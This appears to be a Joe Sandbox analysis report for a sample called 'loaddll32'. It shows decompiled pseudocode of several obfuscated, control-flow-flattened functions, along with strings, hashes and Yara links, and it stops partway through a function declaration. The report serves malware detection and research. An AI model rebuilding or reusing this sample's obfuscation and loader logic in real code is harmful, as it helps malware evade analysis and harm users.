				 *(_t344 + 0x4c) =  *(_t344 + 0x4c) * 0x47;
				 *(_t344 + 0x4c) =  *(_t344 + 0x4c) ^ 0x4e906ac6;
				 *(_t344 + 0x60) = 0x906ac9;
				_t338 = 0x13;
				_t330 =  *((intOrPtr*)(_t344 + 0x78));
				_t342 =  *((intOrPtr*)(_t344 + 0x78));
				 *(_t344 + 0x60) =  *(_t344 + 0x60) * 3;
				 *(_t344 + 0x60) =  *(_t344 + 0x60) ^ 0x01b02f9b;
				 *(_t344 + 0x48) = 0xe018a0;
				 *(_t344 + 0x48) =  *(_t344 + 0x48) >> 3;
				 *(_t344 + 0x48) =  *(_t344 + 0x48) << 4;
				 *(_t344 + 0x48) =  *(_t344 + 0x48) ^ 0x01c3463d;
				 *(_t344 + 0x44) = 0xcf92eb;
				 *(_t344 + 0x44) =  *(_t344 + 0x44) | 0xa78abf74;
				 *(_t344 + 0x44) =  *(_t344 + 0x44) + 0x2871;
				 *(_t344 + 0x44) =  *(_t344 + 0x44) ^ 0xa7cf65bf;
				 *(_t344 + 0x40) = 0xa30b5e;
				 *(_t344 + 0x40) =  *(_t344 + 0x40) / _t338;
				 *(_t344 + 0x40) =  *(_t344 + 0x40) ^ 0xa5b52837;
				 *(_t344 + 0x40) =  *(_t344 + 0x40) ^ 0xa5b9bcfc;
				 *(_t344 + 0x50) = 0x1f98d4;
				 *(_t344 + 0x50) =  *(_t344 + 0x50) ^ 0x1ce7877d;
				 *(_t344 + 0x50) =  *(_t344 + 0x50) >> 9;
				 *(_t344 + 0x50) =  *(_t344 + 0x50) ^ 0x000a2579;
				 *(_t344 + 0x64) = 0x5b61ba;
				 *(_t344 + 0x64) =  *(_t344 + 0x64) + 0xffffd71d;
				 *(_t344 + 0x64) =  *(_t344 + 0x64) ^ 0x005007f5;
				 *(_t344 + 0x2c) = 0xb4bbf5;
				 *(_t344 + 0x2c) =  *(_t344 + 0x2c) ^ 0x03029a47;
				 *(_t344 + 0x2c) =  *(_t344 + 0x2c) >> 0xf;
				 *(_t344 + 0x2c) =  *(_t344 + 0x2c) ^ 0x93b7d07c;
				 *(_t344 + 0x2c) =  *(_t344 + 0x2c) ^ 0x93b00a56;
				 *(_t344 + 0x28) = 0x1351a7;
				 *(_t344 + 0x28) =  *(_t344 + 0x28) >> 9;
				 *(_t344 + 0x28) =  *(_t344 + 0x28) ^ 0xc8bf819f;
				 *(_t344 + 0x28) =  *(_t344 + 0x28) * 0x2d;
				 *(_t344 + 0x28) =  *(_t344 + 0x28) ^ 0x49a4694e;
				 *(_t344 + 0x70) = 0x74ba7c;
				 *(_t344 + 0x70) =  *(_t344 + 0x70) ^ 0x3ad619e0;
				 *(_t344 + 0x70) =  *(_t344 + 0x70) ^ 0x3aa46fbb;
				 *(_t344 + 0x30) = 0x6db52d;
				 *(_t344 + 0x30) =  *(_t344 + 0x30) << 9;
				 *(_t344 + 0x30) =  *(_t344 + 0x30) + 0xffffb915;
				 *(_t344 + 0x30) =  *(_t344 + 0x30) | 0x57796199;
				 *(_t344 + 0x30) =  *(_t344 + 0x30) ^ 0xdf7399d9;
				 *(_t344 + 0x54) = 0x4f3eba;
				 *(_t344 + 0x54) =  *(_t344 + 0x54) + 0xffff5dec;
				 *(_t344 + 0x54) =  *(_t344 + 0x54) << 7;
				 *(_t344 + 0x54) =  *(_t344 + 0x54) ^ 0x274d646c;
				while(1) {
					L1:
					_t316 =  *(_t344 + 0x68);
					while(1) {
						L2:
						_t261 =  *((intOrPtr*)(_t344 + 0x6c));
						L3:
						while(_t288 != 0x42bf5b6) {
							if(_t288 == 0x434f657) {
								_push( *(_t344 + 0x1c));
								_push( *(_t344 + 0x40));
								_push( *(_t344 + 0x28));
								 *((char*)(_t344 + 0x1f)) =  *((intOrPtr*)(_t330 + 1));
								 *(_t344 + 0x1e) =  *((intOrPtr*)(_t330 + 3));
								_t268 = E0087E1F8(0x861758,  *(_t344 + 0x30), __eflags);
								_push( *(_t330 + 2) & 0x000000ff);
								E0086F96F( *(_t344 + 0x74), __eflags, 0x10,  *(_t344 + 0x3f) & 0x000000ff, _t268,  *(_t344 + 0x1e) & 0x000000ff,  *((intOrPtr*)(_t344 + 0x84)), _t342 + 0x20,  *(_t330 + 2) & 0x000000ff,  *(_t344 + 0x60),  *((intOrPtr*)(_t344 + 0x58)),  *(_t344 + 0x50));
								_t223 = _t344 + 0x5c; // 0xa2772
								E0087FECB(_t268,  *((intOrPtr*)(_t344 + 0x90)),  *((intOrPtr*)(_t344 + 0xa0)),  *(_t344 + 0x64),  *_t223);
								_t344 = _t344 + 0x40;
								 *(_t342 + 0x14) = ( *(_t330 + 4) & 0x000000ff) << 0x00000008 |  *(_t330 + 5) & 0x000000ff;
								_t274 =  *((intOrPtr*)(_t330 + 6));
								_t296 =  *((intOrPtr*)(_t330 + 7));
								_t330 = _t330 + 8;
								_t288 = 0x42bf5b6;
								 *(_t342 + 0x44) = (_t274 & 0x000000ff) << 0x00000008 | _t296 & 0x000000ff;
								goto L1;
							} else {
								if(_t288 == 0x4bd14f4) {
									_t326 =  *0x886228; // 0x0
									_t288 = 0x70ba79f;
									_t316 = _t326 + 0x14;
									 *(_t344 + 0x68) = _t316;
									goto L2;
								} else {
									if(_t288 == 0x70ba79f) {
										_t277 = E00873D85( *(_t344 + 0x60), 0x886000, __eflags, _t344 + 0x78,  *(_t344 + 0x18));
										_t316 =  *(_t344 + 0x70);
										_t330 = _t277;
										 *((intOrPtr*)(_t344 + 0x7c)) = _t277;
										_t261 = _t277 +  *((intOrPtr*)(_t344 + 0x78));
										 *((intOrPtr*)(_t344 + 0x6c)) = _t261;
										_t288 = 0xc4a3c33;
										continue;
									} else {
										if(_t288 == 0x9fd5b32) {
											__eflags = _t330 - _t261;
											asm("sbb ecx, ecx");
											_t288 = (_t288 & 0x0165beb9) + 0xae47d7a;
											continue;
										} else {
											if(_t288 == 0xae47d7a) {
												E00882B09( *((intOrPtr*)(_t344 + 0x78)),  *((intOrPtr*)(_t344 + 0x7c)),  *((intOrPtr*)(_t344 + 0x34)),  *(_t344 + 0x54));
											} else {
												if(_t288 != 0xc4a3c33) {
													L17:
													__eflags = _t288 - 0xd28cf5a;
													if(__eflags != 0) {
														L2:
														_t261 =  *((intOrPtr*)(_t344 + 0x6c));
														continue;
													}
												} else {
													_push(_t288);
													_push(_t288);
													_t342 = E0086C5D8(0x60);
													_t344 = _t344 + 0xc;
													if(_t342 != 0) {
														_t288 = 0x434f657;
														while(1) {
															L1:
															_t316 =  *(_t344 + 0x68);
															while(1) {
																L2:
																_t261 =  *((intOrPtr*)(_t344 + 0x6c));
																goto L3;
															}
														}
													}
												}
											}
										}
									}
								}
							}
							_t289 =  *0x886228; // 0x0
							 *(_t289 + 0x1c) =  *(_t289 + 0x1c) & 0x00000000;
							 *((intOrPtr*)(_t289 + 4)) =  *((intOrPtr*)(_t289 + 0x14));
							__eflags = 1;
							return 1;
						}
						_t262 =  *0x886228; // 0x0
						_t288 = 0x9fd5b32;
						 *_t316 = _t342;
						_t316 = _t342 + 0x18;
						 *(_t344 + 0x68) = _t316;
						_t235 = _t262 + 0x18;
						 *_t235 =  *((intOrPtr*)(_t262 + 0x18)) + 1;
						__eflags =  *_t235;
						goto L17;
					}
				}
			}

0x00883eec
0x00883ef3
0x00883ef8
0x00883efd
0x00883f05
0x00883f0d
0x00883f15
0x00883f1d
0x00883f2e
0x00883f38
0x00883f3d
0x00883f43
0x00883f48
0x00883f50
0x00883f58
0x00883f60
0x00883f65
0x00883f6d
0x00883f75
0x00883f7e
0x00883f83
0x00883f89
0x00883f91
0x00883f99
0x00883fa1
0x00883fa6
0x00883fae
0x00883fba
0x00883fbf
0x00883fc5
0x00883fca
0x00883fd2
0x00883fda
0x00883fe6
0x00883feb
0x00883ff5
0x00883ff8
0x00883ffc
0x00884004
0x0088400c
0x00884014
0x0088401c
0x00884024
0x0088402c
0x00884034
0x0088403c
0x00884041
0x00884049
0x00884051
0x00884059
0x00884061
0x00884069
0x00884071
0x00884079
0x00884086
0x0088408a
0x00884094
0x008840a3
0x008840a4
0x008840a8
0x008840ac
0x008840b0
0x008840b8
0x008840c0
0x008840c5
0x008840ca
0x008840d2
0x008840da
0x008840e2
0x008840ea
0x008840f2
0x00884100
0x00884104
0x0088410c
0x00884114
0x0088411c
0x00884124
0x00884129
0x00884131
0x00884139
0x00884141
0x00884149
0x00884151
0x00884159
0x0088415e
0x00884166
0x0088416e
0x00884176
0x0088417b
0x00884188
0x0088418c
0x00884194
0x0088419c
0x008841a4
0x008841ac
0x008841b4
0x008841b9
0x008841c1
0x008841c9
0x008841d1
0x008841d9
0x008841e1
0x008841e6
0x008841ee
0x008841ee
0x008841ee
0x008841f2
0x008841f2
0x008841f2
0x00000000
0x008841f6
0x00884208
0x008842d3
0x008842df
0x008842e5
0x008842f0
0x008842f7
0x008842fb
0x0088430a
0x00884335
0x0088433a
0x00884352
0x0088435b
0x00884369
0x0088436d
0x00884370
0x00884373
0x0088437c
0x00884388
0x00000000
0x0088420e
0x00884214
0x008842bc
0x008842c2
0x008842c7
0x008842ca
0x00000000
0x0088421a
0x00884220
0x00884299
0x0088429e
0x008842a2
0x008842a5
0x008842a9
0x008842ae
0x008842b2
0x00000000
0x00884222
0x00884228
0x00884272
0x00884274
0x0088427c
0x00000000
0x0088422a
0x00884230
0x008843c4
0x00884236
0x0088423c
0x008843a7
0x008843a7
0x008843ad
0x008841f2
0x008841f2
0x00000000
0x008841f2
0x00884242
0x00884252
0x00884253
0x0088425b
0x0088425d
0x00884262
0x00884268
0x008841ee
0x008841ee
0x008841ee
0x008841f2
0x008841f2
0x008841f2
0x00000000
0x008841f2
0x008841f2
0x008841ee
0x00884262
0x0088423c
0x00884230
0x00884228
0x00884220
0x00884214
0x008843cb
0x008843d7
0x008843db
0x008843e0
0x008843e5
0x008843e5
0x00884391
0x00884396
0x0088439b
0x0088439d
0x008843a0
0x008843a4
0x008843a4
0x008843a4
0x00000000
0x008843a4
0x008841f2

Strings

z}, xrefs: 0088422A
q(, xrefs: 008840E2
ldM', xrefs: 008841E6
r', xrefs: 0088433A
y%, xrefs: 00884129

Memory Dump Source

Source File: 00000000.00000002.703048375.0000000000861000.00000020.00000001.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.703041906.0000000000860000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.703166511.0000000000886000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: ldM'$q($r'$y%$z}
API String ID: 0-1771948706
Opcode ID: 5a3354c5f1549faf2f97166af7611a77ff409a25de1e3f04b2608fa3b1013dfd
Instruction ID: 858a5d334af8d108913d03bbe447436bfe16125320e7cc94e6c925520e7aca5c
Opcode Fuzzy Hash: 5a3354c5f1549faf2f97166af7611a77ff409a25de1e3f04b2608fa3b1013dfd
Instruction Fuzzy Hash: A2D150721083819FD368DF29C48955BBFF2FB95358F149A0DF2A696220D3B5C949CF82

Uniqueness

Uniqueness Score: -1.00%

Function 0086FB8E, Relevance: 6.5, Strings: 5, Instructions: 266
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E0086FB8E(void* __ecx, intOrPtr* __edx, intOrPtr* _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				void* _t261;
				intOrPtr* _t284;
				void* _t286;
				intOrPtr _t294;
				intOrPtr* _t295;
				void* _t297;
				intOrPtr* _t299;
				void* _t301;
				void* _t325;
				intOrPtr* _t327;
				signed int _t328;
				signed int _t329;
				signed int _t330;
				signed int _t331;
				signed int _t332;
				signed int _t333;
				signed int _t334;
				signed int* _t337;

				_t299 = _a4;
				_push(_a8);
				_t327 = __edx;
				_push(_t299);
				_push(__edx);
				_push(__ecx);
				E0087FE29(_t261);
				_v92 = 0x4ad2af;
				_t337 =  &(( &_v124)[4]);
				_v92 = _v92 << 4;
				_t325 = 0;
				_t301 = 0xeae8bd1;
				_t328 = 0x27;
				_v92 = _v92 * 0x30;
				_v92 = _v92 ^ 0xe0780d01;
				_v32 = 0x52ecdf;
				_v32 = _v32 | 0x4795fc12;
				_v32 = _v32 ^ 0x47d7fcde;
				_v40 = 0x6c24d1;
				_v40 = _v40 + 0xffffd677;
				_v40 = _v40 ^ 0x006bfb48;
				_v124 = 0xafb159;
				_v124 = _v124 + 0x853c;
				_v124 = _v124 * 0x3c;
				_v124 = _v124 + 0xffffb483;
				_v124 = _v124 ^ 0x294c7f6f;
				_v116 = 0x2e5989;
				_v116 = _v116 << 3;
				_v116 = _v116 << 0xc;
				_v116 = _v116 + 0xffff32fd;
				_v116 = _v116 ^ 0x2cc3b2fd;
				_v104 = 0xb70fe2;
				_v104 = _v104 * 0x61;
				_v104 = _v104 >> 0xd;
				_v104 = _v104 >> 9;
				_v104 = _v104 ^ 0x00000115;
				_v20 = 0x29c7ba;
				_v20 = _v20 / _t328;
				_v20 = _v20 ^ 0x0001123f;
				_v44 = 0xd235de;
				_t329 = 0x19;
				_v44 = _v44 * 0x34;
				_v44 = _v44 ^ 0x2ab83bf3;
				_v120 = 0x2b8a20;
				_v120 = _v120 / _t329;
				_v120 = _v120 + 0xd97b;
				_v120 = _v120 + 0x9745;
				_v120 = _v120 ^ 0x00091694;
				_v80 = 0x44ed89;
				_v80 = _v80 << 8;
				_v80 = _v80 + 0x6d47;
				_v80 = _v80 ^ 0x44e06617;
				_v84 = 0x8c3da4;
				_v84 = _v84 << 3;
				_v84 = _v84 + 0xffff28ee;
				_v84 = _v84 ^ 0x04621daf;
				_v88 = 0x7b0e01;
				_t330 = 0x2a;
				_v88 = _v88 * 0x7e;
				_v88 = _v88 / _t330;
				_v88 = _v88 ^ 0x01771ea0;
				_v48 = 0xf210e7;
				_t331 = 0x56;
				_v48 = _v48 / _t331;
				_v48 = _v48 ^ 0x000151ed;
				_v52 = 0xb85aaa;
				_v52 = _v52 ^ 0x7279f80c;
				_v52 = _v52 ^ 0x72c0fdc9;
				_v108 = 0xe210ad;
				_v108 = _v108 + 0xffffc30f;
				_v108 = _v108 ^ 0xff005d9c;
				_v108 = _v108 ^ 0x468aee4e;
				_v108 = _v108 ^ 0xb96c249f;
				_v36 = 0xf02045;
				_t332 = 0x7e;
				_v36 = _v36 * 0x7d;
				_v36 = _v36 ^ 0x753d6877;
				_v76 = 0x890c0b;
				_v76 = _v76 | 0x3fa19484;
				_v76 = _v76 + 0xc76f;
				_v76 = _v76 ^ 0x3fa932ba;
				_v112 = 0xdcee96;
				_v112 = _v112 << 0xb;
				_v112 = _v112 / _t332;
				_v112 = _v112 ^ 0x6c4d9ccb;
				_v112 = _v112 ^ 0x6d94fd95;
				_v56 = 0x741505;
				_t333 = 0x1d;
				_v56 = _v56 / _t333;
				_v56 = _v56 + 0xe34c;
				_v56 = _v56 ^ 0x00059e64;
				_v24 = 0xde7835;
				_t334 = 0x73;
				_v24 = _v24 * 7;
				_v24 = _v24 ^ 0x0614b333;
				_v28 = 0x817a7e;
				_v28 = _v28 + 0x50ff;
				_v28 = _v28 ^ 0x008db9da;
				_v60 = 0x30460f;
				_v60 = _v60 | 0x5b476089;
				_v60 = _v60 + 0x7857;
				_v60 = _v60 ^ 0x5b7b85ad;
				_v64 = 0x3287c5;
				_v64 = _v64 >> 0x10;
				_v64 = _v64 | 0xf6bf374a;
				_v64 = _v64 ^ 0xf6be02d9;
				_v68 = 0xbf5def;
				_v68 = _v68 + 0xffff47b3;
				_v68 = _v68 + 0xffff0d11;
				_v68 = _v68 ^ 0x00bf58a8;
				_v72 = 0xc5c956;
				_v72 = _v72 ^ 0x0920ed5d;
				_v72 = _v72 / _t334;
				_v72 = _v72 ^ 0x00102287;
				_v16 = 0x6e7810;
				_v16 = _v16 + 0xffff2e79;
				_v16 = _v16 ^ 0x0061adb7;
				_v96 = 0xe3f1bb;
				_v96 = _v96 | 0x17c89f2a;
				_v96 = _v96 ^ 0x2d56d01e;
				_v96 = _v96 ^ 0x01e2669f;
				_v96 = _v96 ^ 0x3b5230bc;
				_v100 = 0x967d31;
				_v100 = _v100 | 0xebdf376e;
				_v100 = _v100 + 0x87ad;
				_v100 = _v100 ^ 0xebeed43d;
				do {
					while(_t301 != 0x242fff5) {
						if(_t301 == 0x95dc10a) {
							_push(_t301);
							_push(_t301);
							_t294 = E0086C5D8(_v8);
							_t337 =  &(_t337[3]);
							_v12 = _t294;
							if(_t294 != 0) {
								_t301 = 0x242fff5;
								continue;
							}
						} else {
							if(_t301 == 0xb01d963) {
								_t295 =  *0x886224; // 0x0
								_t297 = E00862194(_v40, _v44, _t301, _v120, _v80, _v124, _v84, _v88, _t301, _v48,  *_t327, _v52,  &_v8,  *((intOrPtr*)(_t327 + 4)), _v92,  *_t295, _t325);
								_t337 =  &(_t337[0xf]);
								if(_t297 == _v116) {
									_t301 = 0x95dc10a;
									continue;
								}
							} else {
								if(_t301 == 0xb93db5b) {
									E00882B09(_v16, _v12, _v96, _v100);
								} else {
									if(_t301 != 0xeae8bd1) {
										goto L13;
									} else {
										_t301 = 0xb01d963;
										continue;
									}
								}
							}
						}
						L17:
						return _t325;
					}
					_t284 =  *0x886224; // 0x0
					_t286 = E00862194(_v8, _v56, _t301, _v24, _v28, _v104, _v60, _v64, _t301, _v68,  *_t327, _v72,  &_v8,  *((intOrPtr*)(_t327 + 4)), _v32,  *_t284, _v12);
					_t337 =  &(_t337[0xf]);
					if(_t286 == _v20) {
						 *_t299 = _v12;
						_t325 = 1;
						 *((intOrPtr*)(_t299 + 4)) = _v8;
					} else {
						_t301 = 0xb93db5b;
						goto L13;
					}
					goto L17;
					L13:
				} while (_t301 != 0xf5a5c60);
				goto L17;
			}

0x0086fb92
0x0086fb9c
0x0086fba3
0x0086fba5
0x0086fba6
0x0086fba7
0x0086fba8
0x0086fbad
0x0086fbb5
0x0086fbb8
0x0086fbc4
0x0086fbc6
0x0086fbcd
0x0086fbd0
0x0086fbd4
0x0086fbdc
0x0086fbe4
0x0086fbec
0x0086fbf4
0x0086fbfc
0x0086fc04
0x0086fc0c
0x0086fc14
0x0086fc21
0x0086fc25
0x0086fc2d
0x0086fc35
0x0086fc3d
0x0086fc42
0x0086fc47
0x0086fc4f
0x0086fc57
0x0086fc64
0x0086fc68
0x0086fc6d
0x0086fc72
0x0086fc7a
0x0086fc8a
0x0086fc8e
0x0086fc96
0x0086fca3
0x0086fca6
0x0086fcaa
0x0086fcb2
0x0086fcc2
0x0086fcc6
0x0086fcce
0x0086fcd6
0x0086fcde
0x0086fce6
0x0086fceb
0x0086fcf3
0x0086fcfb
0x0086fd03
0x0086fd08
0x0086fd10
0x0086fd18
0x0086fd25
0x0086fd26
0x0086fd30
0x0086fd34
0x0086fd3e
0x0086fd4c
0x0086fd51
0x0086fd57
0x0086fd5f
0x0086fd67
0x0086fd6f
0x0086fd77
0x0086fd7f
0x0086fd87
0x0086fd8f
0x0086fd97
0x0086fd9f
0x0086fdac
0x0086fdaf
0x0086fdb3
0x0086fdbb
0x0086fdc3
0x0086fdcb
0x0086fdd3
0x0086fddb
0x0086fde3
0x0086fdf0
0x0086fdf4
0x0086fdfc
0x0086fe04
0x0086fe10
0x0086fe15
0x0086fe1b
0x0086fe23
0x0086fe2b
0x0086fe38
0x0086fe39
0x0086fe3d
0x0086fe45
0x0086fe4d
0x0086fe55
0x0086fe5d
0x0086fe65
0x0086fe6d
0x0086fe75
0x0086fe7d
0x0086fe85
0x0086fe8a
0x0086fe92
0x0086fe9a
0x0086fea2
0x0086feaa
0x0086feb2
0x0086feba
0x0086fec2
0x0086fed0
0x0086fed4
0x0086fedc
0x0086fee4
0x0086feec
0x0086fef4
0x0086fefc
0x0086ff04
0x0086ff0c
0x0086ff14
0x0086ff1c
0x0086ff24
0x0086ff31
0x0086ff39
0x0086ff41
0x0086ff41
0x0086ff4f
0x0086ffed
0x0086ffee
0x0086fff6
0x0086fffb
0x0086fffe
0x00870007
0x0087000d
0x00000000
0x0087000d
0x0086ff55
0x0086ff5b
0x0086ff7c
0x0086ffc1
0x0086ffc6
0x0086ffcd
0x0086ffd3
0x00000000
0x0086ffd3
0x0086ff5d
0x0086ff63
0x0087009c
0x0086ff69
0x0086ff6f
0x00000000
0x0086ff75
0x0086ff75
0x00000000
0x0086ff75
0x0086ff6f
0x0086ff63
0x0086ff5b
0x008700bb
0x008700c4
0x008700c4
0x0087001b
0x00870065
0x0087006a
0x00870071
0x008700ae
0x008700b0
0x008700b8
0x00870073
0x00870073
0x00000000
0x00870073
0x00000000
0x00870078
0x00870078
0x00000000

Strings

Wx, xrefs: 0086FE6D
L, xrefs: 0086FE1B
wh=u, xrefs: 0086FDB3
] , xrefs: 0086FEC2
Gm, xrefs: 0086FCEB

Memory Dump Source

Source File: 00000000.00000002.703048375.0000000000861000.00000020.00000001.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.703041906.0000000000860000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.703166511.0000000000886000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: Gm$L$Wx$] $wh=u
API String ID: 0-1494249286
Opcode ID: 083388d158ebb645e975c9271266396566f374329b711f7d0b75eaa458adeb8d
Instruction ID: 801788189ba353239e52033e90f27472cd0f49effdadc044b982e75427d5d28c
Opcode Fuzzy Hash: 083388d158ebb645e975c9271266396566f374329b711f7d0b75eaa458adeb8d
Instruction Fuzzy Hash: DDD11E724097809FC768CF66D88991BFBE1FB85758F10891DF2A986260D7B2C949CF07

Uniqueness

Uniqueness Score: -1.00%

Function 00878D3D, Relevance: 6.4, Strings: 5, Instructions: 143
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E00878D3D() {
				signed int _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _t139;
				intOrPtr _t141;
				intOrPtr _t147;
				signed int _t151;
				signed int _t152;
				signed int _t153;
				signed int _t154;
				intOrPtr* _t155;
				signed int _t170;
				void* _t172;
				signed int* _t174;

				_t174 =  &_v60;
				_v4 = _v4 & 0x00000000;
				_v16 = 0xb96ea3;
				_v12 = 0x2b597c;
				_v8 = 0x15d14c;
				_v24 = 0xfb9f01;
				_v24 = _v24 + 0xffffc2ea;
				_v24 = _v24 ^ 0x00f09b24;
				_v28 = 0x44d8ac;
				_v28 = _v28 << 2;
				_v28 = _v28 ^ 0x0118b46b;
				_v56 = 0xb4bcfb;
				_v56 = _v56 >> 0x10;
				_v56 = _v56 + 0x1918;
				_t151 = 0x33;
				_v56 = _v56 / _t151;
				_t172 = 0x18a299a;
				_v56 = _v56 ^ 0x00075f97;
				_v60 = 0x54631c;
				_t152 = 0x32;
				_v60 = _v60 / _t152;
				_v60 = _v60 + 0xe0cb;
				_v60 = _v60 + 0x7b8a;
				_v60 = _v60 ^ 0x000a1fda;
				_v32 = 0x2b0ed;
				_v32 = _v32 >> 0xb;
				_v32 = _v32 | 0x09ea9e28;
				_v32 = _v32 ^ 0x09ed7baa;
				_v48 = 0x16a7f0;
				_v48 = _v48 << 6;
				_t170 = 0x54;
				_v48 = _v48 / _t170;
				_t153 = 0x50;
				_v48 = _v48 / _t153;
				_v48 = _v48 ^ 0x000d9328;
				_v52 = 0x3f1fdb;
				_v52 = _v52 | 0x0053e637;
				_v52 = _v52 ^ 0xce168c33;
				_v52 = _v52 >> 4;
				_v52 = _v52 ^ 0x0ce6f5f4;
				_v36 = 0x33e495;
				_v36 = _v36 + 0xc7cc;
				_v36 = _v36 / _t170;
				_v36 = _v36 + 0x230d;
				_v36 = _v36 ^ 0x000308d4;
				_v40 = 0xaa804b;
				_t139 = _v40;
				_t154 = 0x42;
				_t169 = _t139 % _t154;
				_v40 = _t139 / _t154;
				_v40 = _v40 + 0xffff246c;
				_v40 = _v40 >> 7;
				_v40 = _v40 ^ 0x000d5f20;
				_v44 = 0x5ad1c5;
				_v44 = _v44 + 0x4d5e;
				_v44 = _v44 + 0xffff9f53;
				_v44 = _v44 + 0xffff11b0;
				_v44 = _v44 ^ 0x005bbdbb;
				_v20 = 0x89125f;
				_v20 = _v20 ^ 0x0bb83411;
				_v20 = _v20 ^ 0x0b3ba340;
				_t155 =  *0x886208; // 0x0
				do {
					while(_t172 != 0x550abf) {
						if(_t172 == 0x18a299a) {
							_push(_t155);
							_push(_t155);
							_t155 = E0086C5D8(0x2c);
							_t174 =  &(_t174[3]);
							 *0x886208 = _t155;
							_t172 = 0x550abf;
							continue;
						} else {
							if(_t172 != 0x6125a42) {
								goto L8;
							} else {
								_t147 = E00870EBC(_v36, _t169, _v40, _t155, _v44, _v20, _t155, _t155, 0, E008836AA);
								_t155 =  *0x886208; // 0x0
								 *_t155 = _t147;
							}
						}
						L5:
						return 0 | _t155 != 0x00000000;
					}
					_t169 = _v48;
					_t141 = E008648DD(_v32, _v48, _v52);
					_t155 =  *0x886208; // 0x0
					_t174 = _t174 - 0x10 + 0x14;
					_t172 = 0x6125a42;
					 *((intOrPtr*)(_t155 + 0x18)) = _t141;
					L8:
				} while (_t172 != 0x92686f5);
				goto L5;
			}

0x00878d3d
0x00878d40
0x00878d47
0x00878d4f
0x00878d57
0x00878d5f
0x00878d67
0x00878d6f
0x00878d77
0x00878d7f
0x00878d84
0x00878d8c
0x00878d94
0x00878d99
0x00878dab
0x00878db5
0x00878db9
0x00878dbb
0x00878dc3
0x00878dd1
0x00878dd6
0x00878dda
0x00878de2
0x00878dea
0x00878df2
0x00878dfa
0x00878dff
0x00878e07
0x00878e0f
0x00878e17
0x00878e22
0x00878e27
0x00878e31
0x00878e36
0x00878e3a
0x00878e42
0x00878e4a
0x00878e52
0x00878e5a
0x00878e5f
0x00878e67
0x00878e6f
0x00878e7f
0x00878e85
0x00878e8d
0x00878e95
0x00878e9d
0x00878ea1
0x00878ea2
0x00878ea4
0x00878ea8
0x00878eb0
0x00878eb5
0x00878ebd
0x00878ec5
0x00878ecd
0x00878ed5
0x00878ee2
0x00878eef
0x00878ef7
0x00878eff
0x00878f07
0x00878f0d
0x00878f0d
0x00878f13
0x00878f66
0x00878f67
0x00878f6f
0x00878f71
0x00878f74
0x00878f7a
0x00000000
0x00878f15
0x00878f17
0x00000000
0x00878f1d
0x00878f37
0x00878f3c
0x00878f45
0x00878f45
0x00878f17
0x00878f48
0x00878f55
0x00878f55
0x00878f85
0x00878f8d
0x00878f92
0x00878f98
0x00878f9b
0x00878f9d
0x00878fa0
0x00878fa0
0x00000000

Strings

7S, xrefs: 00878E4A
|Y+, xrefs: 00878D4F
#, xrefs: 00878E85
^M, xrefs: 00878EC5
_, xrefs: 00878EB5

Memory Dump Source

Source File: 00000000.00000002.703048375.0000000000861000.00000020.00000001.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.703041906.0000000000860000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.703166511.0000000000886000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: #$ _$7S$^M$|Y+
API String ID: 0-3744723356
Opcode ID: 80bebc5696e58817f970860255c8fb087971d844dbbfe51dc0d32bbb61f58b41
Instruction ID: c4a95b301dafaac105967d2c458c8bd7ec6105df191ff5ab80fcb1069e0a2b9c
Opcode Fuzzy Hash: 80bebc5696e58817f970860255c8fb087971d844dbbfe51dc0d32bbb61f58b41
Instruction Fuzzy Hash: F95157715083419FD348DF29D88A50BBBE1FBC8768F008A1DF099A6260D7B5DA49CF4A

Uniqueness

Uniqueness Score: -1.00%

Function 0087437A, Relevance: 5.4, Strings: 4, Instructions: 412
COMMONCrypto

Download Yara Rule

C-Code - Quality: 82%

			E0087437A(intOrPtr* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				intOrPtr* _v156;
				intOrPtr _v168;
				char _v228;
				short _v772;
				short _v774;
				char _v776;
				signed int _v820;
				char _v1340;
				char _v1860;
				void* _t400;
				signed int _t441;
				signed int _t445;
				intOrPtr _t447;
				intOrPtr _t458;
				void* _t460;
				void* _t508;
				signed int _t519;
				signed int _t520;
				signed int _t521;
				signed int _t522;
				signed int _t523;
				signed int _t524;
